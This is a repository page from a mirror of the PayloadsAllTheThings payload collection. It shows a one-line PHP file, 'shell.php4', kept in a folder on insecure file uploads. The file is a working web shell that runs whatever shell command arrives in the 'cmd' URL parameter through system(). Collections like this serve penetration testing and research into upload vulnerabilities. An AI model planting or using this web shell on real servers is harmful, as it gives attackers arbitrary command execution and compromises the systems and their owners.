This website requires JavaScript.
Explore
Help
Register
Sign In
weyne
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/weyne85/PayloadsAllTheThings.git
synced
2025-10-29 16:57:02 +00:00
Code
Issues
Packages
Projects
Releases
Wiki
Activity
Files
76f281cc930ba9049164f4e57bc50400bb693af1
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.php4
Swk
76f281cc93
Deployed
55afcb1
with MkDocs version: 1.5.3
2024-03-30 12:22:06 +00:00
1 line
43 B
PHP
Raw
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink